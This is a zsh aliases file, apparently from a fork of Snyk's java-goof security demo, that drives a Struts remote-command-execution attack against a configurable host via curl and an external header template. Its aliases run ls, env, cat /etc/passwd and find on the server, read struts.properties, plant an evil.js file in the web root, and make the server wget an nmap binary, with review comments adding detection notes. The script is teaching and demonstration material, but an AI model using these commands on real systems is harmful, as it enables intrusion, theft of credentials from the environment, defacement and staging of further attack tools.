forked from snyk-labs/java-goof
struts-aliases.sh
# Target selection for the Struts demo aliases defined below.
# Defaults are applied only when JAVA_GOOF_HOST is unset or empty. When the
# caller presets JAVA_GOOF_HOST, JAVA_GOOF_URL is left untouched, so the caller
# has to provide a matching JAVA_GOOF_URL as well.
if [ -z "$JAVA_GOOF_HOST" ]; then
  JAVA_GOOF_HOST=java-goof.herokuapp.com
  JAVA_GOOF_URL=https://$JAVA_GOOF_HOST
  export JAVA_GOOF_HOST JAVA_GOOF_URL
fi
# Extra curl option read by struts_base_command on every run; -v makes curl
# print the request and response headers.
JAVA_GOOF_DEBUG=-v
export JAVA_GOOF_DEBUG
# Shared request pipeline behind struts1..struts8: each of those aliases sets
# EXP_MESSAGE and EXP_COMMAND and then invokes this one.
#   1. echo prints EXP_MESSAGE as a progress line.
#   2. struts-exploit-headers.txt is read from the current directory; its
#      contents are not part of this file.
#   3. sed replaces the first literal token COMMAND on each line of that
#      template with EXP_COMMAND. "/" is the sed delimiter, which is why the
#      aliases below write "\/" inside paths and URLs.
#   4. xargs appends the result as the argument of curl's -H option, so the
#      substituted text travels to the server inside a request header.
# Expansion timing: names written as \$NAME are resolved each time the alias
# runs, while $JAVA_GOOF_URL is unescaped inside the double quotes and is
# therefore fixed when this file is sourced; changing it later needs a re-source.
# NOTE(review): "&|" is zsh's background-and-disown operator and is a syntax
# error in bash, so this file appears to be written for zsh - confirm.
# NOTE(review): because the payload is carried in a header, logs that record
# only the request line would presumably not show it; header capture at a
# proxy or WAF is where this traffic becomes visible - verify against your logging.
alias struts_base_command="echo \$EXP_MESSAGE'\n\n' &| cat struts-exploit-headers.txt| sed 's/COMMAND/'\$EXP_COMMAND'/' | xargs curl --http1.0 \$JAVA_GOOF_DEBUG $JAVA_GOOF_URL -H"
# struts0 - detection only: runs nmap's http-vuln-struts-detection.nse script
# against $JAVA_GOOF_HOST (resolved when this file is sourced).
# NOTE(review): the probe is pinned to port 80 while the default JAVA_GOOF_URL
# uses https://, so the check and the later requests may reach different listeners.
alias struts0="nmap -p 80 --script http-vuln-struts-detection.nse $JAVA_GOOF_HOST"
# struts1..struts8 all follow one pattern: export EXP_MESSAGE (progress text)
# and EXP_COMMAND (the command substituted into the header template), then run
# struts_base_command. On the server side the observable effect is presumably
# the application's Java process starting these utilities as child processes -
# verify against process telemetry when building detections.
# struts1 - directory listing of the application's working directory.
alias struts1="export EXP_MESSAGE='Getting list of files...'; export EXP_COMMAND='ls -l'; struts_base_command"
# struts2 - dumps the server process environment, a common place for
# credentials and connection strings.
alias struts2="export EXP_MESSAGE='Getting environment info...'; export EXP_COMMAND='env'; struts_base_command"
# struts3 - reads /etc/passwd.
# NOTE(review): the message text says "password hash file"; on most current
# systems /etc/passwd lists accounts and the hashes live in /etc/shadow.
alias struts3="export EXP_MESSAGE='Getting password hash file...'; export EXP_COMMAND='cat \/etc\/passwd'; struts_base_command"
# struts4 - recursive listing of everything below the working directory.
alias struts4="export EXP_MESSAGE='Getting full list of files...'; export EXP_COMMAND='find .'; struts_base_command"
# struts5 - prints struts.properties from WEB-INF/classes under target/tomcat.*;
# shows that configuration kept outside the served paths is still readable once
# commands run as the application user.
alias struts5="export EXP_MESSAGE='Showing sensitive properties file...'; export EXP_COMMAND='cat .\/target\/tomcat.*\/webapps\/expanded\/WEB-INF\/classes\/struts.properties'; struts_base_command"
# struts6 - writes a marker file into the served static/js directory (integrity
# impact). JAVA_GOOF_TOMCAT_PID is resolved when the alias runs and must match
# the suffix of the server's target/tomcat.* directory (the original comment
# calls it the PID). A read-only web root or file-integrity monitoring on
# served directories is the matching control.
# The doubled "export" word here and in struts7/struts8 is redundant.
alias struts6="export EXP_MESSAGE='Create a file at $JAVA_GOOF_URL/static/js/evil.js...'; export export EXP_COMMAND='echo MUHAHAHAHAHAHAHA > .\/target\/tomcat.'\$JAVA_GOOF_TOMCAT_PID'\/webapps\/expanded\/static\/js\/evil.js'; struts_base_command"
# struts7 - lists the server's network interfaces and addresses.
alias struts7="export EXP_MESSAGE='Gathering internal network information...'; export export EXP_COMMAND='ip addr show'; struts_base_command"
# struts8 - the server itself downloads a static nmap binary with wget (the
# message calls this "uploading"). Egress filtering on the application host and
# alerting on new executables in the application directory are the relevant controls.
alias struts8="export EXP_MESSAGE='Uploading nmap...'; export export EXP_COMMAND='wget https:\/\/github.com\/andrew-d\/static-binaries\/raw\/master\/binaries\/linux\/x86_64\/nmap'; struts_base_command"